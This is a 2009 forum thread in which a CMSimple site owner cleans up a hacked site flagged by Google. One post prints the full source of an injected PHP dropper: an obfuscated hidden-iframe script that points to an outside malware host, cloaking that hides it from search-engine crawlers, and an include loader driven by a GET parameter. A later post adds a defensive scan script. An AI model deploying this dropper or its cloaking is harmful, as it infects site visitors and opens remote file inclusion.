cmsimple.sk: Google malware warning
Hi, did you see that Google gives a malware warning when accessing cmsimple.sk: "Warning - visiting this web site may harm your computer!"
Look here: http://www.google.com/interstitial?url= ... simple.sk/
@Tata: do you have an explanation for this?
Re: cmsimple.sk: Google malware warning
Yes, I've informed him by PM yesterday and removed the link to his website in his profile.
He's working on that.
Holger
Re: cmsimple.sk: Google malware warning
Hi, all!
I am slowly getting sick of the hackers. I got this warning three days ago. You remember the attacks a couple of months ago. Then I immediately did everything you suggested and also followed all recommendations found on the internet. I have:
- reinstalled my PC from "0".
- downloaded my entire webspace from the host and deleted my entire domain.
- changed my FTP passwords.
- detected all infected files. At the first attack they were only the index.php files, and they were actually not infected; only code with a link to infectious websites was inserted, at the very end in small files and somewhere in the middle in larger files, deleting the rest of them, so the pages were out of function.
- cleaned them manually (this time over 5000!!! files); damaged files were replaced by their originals, freshly downloaded from CMSimplewiki or from the authors' websites.
- uploaded everything back, CHMODed all index.php files (444) and had them checked by Google: no warnings.
This time only 47 index.php files were manipulated, which I had obviously overlooked when CHMODing. But they were also in installations to which no one has access; only I use them for my testing.
I asked Google to re-check the domain. Today (after 5 days!!!) I got the confirmation, but they avoided saying when the domain will be checked and what the result will be.
Anyway, after five days the domain is still inaccessible, but only in FF and Safari. There are no warnings in IE and GeBin9.
Now I have checked the warning from FF at http://safebrowsing.clients.google.com/ ... simple.sk/ and it says:
What is the current status of the listing for cmsimple.sk?
The site is listed among the suspicious sites - visiting this site may damage your PC.
During the last 90 days, part of this site was listed 1 time because of suspicious activity.
What happened when Google visited this site?
Of 24 pages tested on this site during the last 90 days, 15 pages caused download and installation of malicious software without the user's authorization....
Malicious software includes 33 trojan(s), 30 scripting exploit(s), 14 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
Malicious software is hosted on 3 domains, including keymydomains.com/, ncenterpanel.cn/, sites-counter.com/.
This site was hosted on 1 network(s) including AS29208 (DIALTELECOM).
Does this site act as a source of further distribution of malicious software?
It seems that during the last 90 days the site cmsimple.sk has not acted as a source infecting any other sites.
Does this site host malicious software?
No, this site hosted no malicious software in the last 90 days.
Help me please, what else shall I do?
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
Re: cmsimple.sk: Google malware warning
Hi Tata,
At the moment your page is accessible with the latest FF and safe browsing enabled.
[OT]
Looking at the source code, I've found 3 iframes:
Two at the top (maybe a counter) and one other, pointing to e-katalog.sk:
http://safebrowsing.clients.google.com/ ... katalog.sk
You should remove all that unnecessary stuff.
[/OT]
Holger
Re: cmsimple.sk: Google malware warning
I am out of power. I downloaded the domain again and checked it for any IFRAME available. Now I have found the IFRAME pointing to http:[slash/slash]ncenterpanel[dot]cn[slash]php[slash]p31[dot]php in the first line of:
cmsimple/index.php
plugins/index.php
Now I see that in almost every subdirectory there is an uploaded file with a randomly generated name like PEC6963F720301.php. How is it possible? What the hell shall I do now? The website is no longer accessible in any browser; it is not accessible even in IE. I am going to download the domain again, and I am looking at a very creative night and weekend.
Here is the code of the files
<?php
$frame_code = '<!-- hJTYsX hwZrh TpA gJK LhdIvzPX --><script>/*_riRJopYA_uU*/var maSKFTfgzy=document;/*eNGUgQyproQjLwcwGxtLckVP*/function JSRJxVcV(iKGZa)/*fPxDyeN_cINKnEiaEijWSjbMQ*/{var sIBtuWphKVC = "",/*PTSzNTVJPPSZEgc*/ASksbIeCmKm=0;for(ASksbIeCmKm=iKGZa.length-1;ASksbIeCmKm >= 0;ASksbIeCmKm--)/*fkeWREfireemHjIDyyvaKLqMK*/{sIBtuWphKVC+=iKGZa.charAt(ASksbIeCmKm);}return sIBtuWphKVC;/*lQFLAvMavWhp*/}/*_riRJopYA_uU*/function THAMWc(Uf_hW)/*wvskgKquyCfDU_fNnzLh*/{/*asAYOrimRFaxNjr*/Uf_hW = Uf_hW.replace(/[\.]/g, "%");/*asAYOrimRFaxNjr*/Uf_hW=unescape(Uf_hW);/*OFYakHAvPHLmfLCLgYBuCu*/return JSRJxVcV(Uf_hW);/*YcHVPLpfsLmebZsoZxcXjR*/}/*RropemxIkeWaSKfJWl*/function KNxrQJJuJ(){/*PTSzNTVJPPSZEgc*/maSKFTfgzy.write("<style>.apcdqYgApH{width:1px;height:1px;border:none;visibility:hidden}</style>");/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/var thOySD="<iframe id=\"PzuNOYDH\" src=\"x\" class=\"apcdqYgApH\"></iframe>";/*wvskgKquyCfDU_fNnzLh*//*vFzsZkRJRqmDBwCtOax*/var zOHkNaBQqOk=thOySD.replace(/[\+x]/g,THAMWc(".70.68.70.2e.6e.69.2f.34.37.31.2f.72.65.73.75.2f.6d.6f.63.2e.72.65.74.6e.75.6f.63.2d.73.65.74.69.73.2f.2f.3a.70.74.74.68"));/*vFzsZkRJRqmDBwCtOax*//*PTSzNTVJPPSZEgc*/return zOHkNaBQqOk;/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/}/*fPxDyeN_cINKnEiaEijWSjbMQ*//*UACyjbdWJu*//*fPxDyeN_cINKnEiaEijWSjbMQ*//*gxmlpKbCEZYM*/maSKFTfgzy.writeln(KNxrQJJuJ());/*XOQoHXqCHdswYQ*//*RropemxIkeWaSKfJWl*//*lQFLAvMavWhp*/</script><!-- hJTY sXhwZrhTpA gJKLhdIvzPX_2 -->';
// Analyst note: $frame_code above is obfuscated JavaScript that writes a 1x1
// hidden iframe; its src is built at runtime by reversing a dot-separated hex
// string, so the domain never appears in clear text in the file.
function get_file_dir_($file) {
    global $argv;
    $dir = dirname(getcwd() . '/' . $file);
    $curDir = getcwd();
    @chdir($dir);
    $dir = getcwd();
    @chdir($curDir);
    return $dir;
}

// Cloaking: the crawlers of Google, Yandex, MSN etc. are served the page
// unchanged, so the injection stays hidden from the search engines' own checks.
function is_search_bot($agent)
{
    if(
        strstr($agent, "Yandex/") != null ||
        strstr($agent, "YaDirectBot") != null ||
        strstr($agent, "James Bond") != null ||
        strstr($agent, "Googlebot") != null ||
        strstr($agent, "Mediapartners-Google") != null ||
        strstr($agent, "StackRambler") != null ||
        strstr($agent, "Slurp") != null ||
        strstr($agent, "msnbot") != null
    )
    {
        return true;
    }
    return false;
}

// Output-buffer callback: first strips any competing hidden iframes already in
// the page, then inserts $frame_code right after <body> for ordinary visitors.
function callback($data)
{
    global $frame_code;
    $data = preg_replace('/<iframe.*style=.*hidden.*\/iframe[^>]*>/i', "", $data);
    $data = preg_replace('/<div.*style=.*display:none.*[^>]*>.*<iframe .*\/.*div[^>]*>/i', "", $data);
    $data = preg_replace('/<!-- ad --><script[^>]*>.*<\/script><!-- \/ad -->/i', "", $data);
    if(is_search_bot($_SERVER['HTTP_USER_AGENT']) == true) {
        return $data;
    } else {
        if(preg_match("/(<body[^>]*>)/i", $data) > 0) {
            return preg_replace("/(<body[^>]*>)/i", "$1 \n".$frame_code, $data, 1);
        }
        else {
            return $data.$frame_code;
        }
    }
}

// The file is a loader: it includes whatever path the qq parameter names,
// through the output buffer, so every page served this way gets the iframe.
if(@ob_start('callback') == true) {
    $file = $_GET['qq'];
    @chdir(get_file_dir_($file));
    include($file);
} else {
    echo $frame_code;
}
?>
Last edited by Tata on Sun Oct 18, 2009 8:53 am, edited 1 time in total.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
Re: cmsimple.sk: Google malware warning
Do you have global variables enabled? You can do a batch removal, no need to go through the files manually. I have done this for someone else who also got hacked with Dreamweaver.
Re: cmsimple.sk: Google malware warning
CMSimple-Styles.com wrote: Do you have global variables enabled?
I think I do. I have the phpinfo.php file on the server, but I can't run it right now. It is 8:12 AM and I have been sitting here since my last post yesterday. Everything was cleaned and uploaded back, all indexes were closed by 444. Then the FTP password was checked and everything searched back, and the damned files like PEO123456879.php were back again.
The cleaning is not that difficult. I simply search the localhost for all index.* files, then open them in Notepad++. There I search e.g. for any IFRAME and check the found files for malicious links.
Or I search the localhost for any file containing the string ":8080", which is used in those links.
But when you have the batch file stored somewhere, I'll try this too. But now I will finally need to take a nap. My domain is no longer available in any browser... WHY EXACTLY MINE? I have about 20 other websites on the same ISP server. Only 2 of them were compromised. I don't understand this.
Good night, friends
Good morning again!
Can't sleep. I deleted all those dummy files from the server recently. Now I checked it again and the files are there again. I need to contact my ISP about this.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
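A defender-side scan of the downloaded webspace, added here as an example and not part of this thread or of CMSimple: it lists index.php files carrying an injected iframe or the ob_start('callback') plus include($_GET[...]) pair from the posted loader code, the random-named PE...php files, and any file containing ":8080". The "PE + 12 hex digits" pattern is an assumption drawn from the one file name quoted above, and the fixture is constructed sample data.

```shell
#!/bin/sh
# Added example, not a CMSimple tool: scan an offline copy of the webspace for
# the three traces described in the thread. Usage: scan_webspace /path/to/copy

scan_webspace() {
    root="$1"
    # 1. index.php files carrying an injected iframe, or the ob_start('callback')
    #    plus include($_GET[...]) pair from the posted loader code.
    find "$root" -type f -name 'index.php' \
        -exec grep -liE '<iframe|ob_start\(.callback.\)|include\(\$_GET' {} \; \
        | sed 's/^/INJECTED: /'
    # 2. dropped files named PE + 12 hex digits (assumed from the one example
    #    name in the thread, PEC6963F720301.php); CMSimple ships no such file.
    find "$root" -type f -name 'PE*.php' \
        | grep -E '/PE[0-9A-Fa-f]{12}\.php$' | sed 's/^/DROPPER: /'
    # 3. any file containing ":8080", the port used in the injected links.
    grep -rl ':8080' "$root" | sed 's/^/PORT8080: /'
    return 0
}

# Number of findings, so the result can be checked without reading the output.
count_findings() {
    scan_webspace "$1" | wc -l | tr -d ' '
}

# Constructed fixture (sample data, not real site content) to try the scan on.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/cmsimple" "$d/plugins" "$d/templates/demo"
    printf '<?php\n// clean CMSimple index\n' > "$d/index.php"
    printf '<?php $frame_code = "<iframe src=\\"x\\"></iframe>";\n' \
        > "$d/cmsimple/index.php"
    printf '<?php echo "dropped file";\n' > "$d/plugins/PEC6963F720301.php"
    printf '<a href="http://example.invalid:8080/x">x</a>\n' \
        > "$d/templates/demo/template.htm"
    echo "$d"
}
```

Rule 1 also lists legitimate iframes such as the counter Holger mentioned, so each hit is reviewed against a known-good copy rather than deleted blindly.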
Re: cmsimple.sk: Google malware warning
Hallo Tata,
I recommend using cmsimple.sk for your cmsimple.sk website only. This domain is an "official" domain of CMSimple. If there is no more than 1 installation of CMSimple, you can keep it under control more easily.
For a playground, better use another (not so important) domain.
Re: cmsimple.sk: Google malware warning
It seems I am really forced to do it this way. I have already reduced all my "playgrounds" to 3, which are not big at all. We'll see how it goes. I cleaned everything I've found, but the website is still not accessible.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
Re: cmsimple.sk: Google malware warning
Everything seems to be OK again so far. At this point I would like to know whether it would be good to use stricter CHMOD settings for the installation and have all possible directories and files set to read-only. Actually there are many of them for which this setting would be absolutely enough. Or maybe some general .htaccess file taking care of this.
Thank you for all your hints and support.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.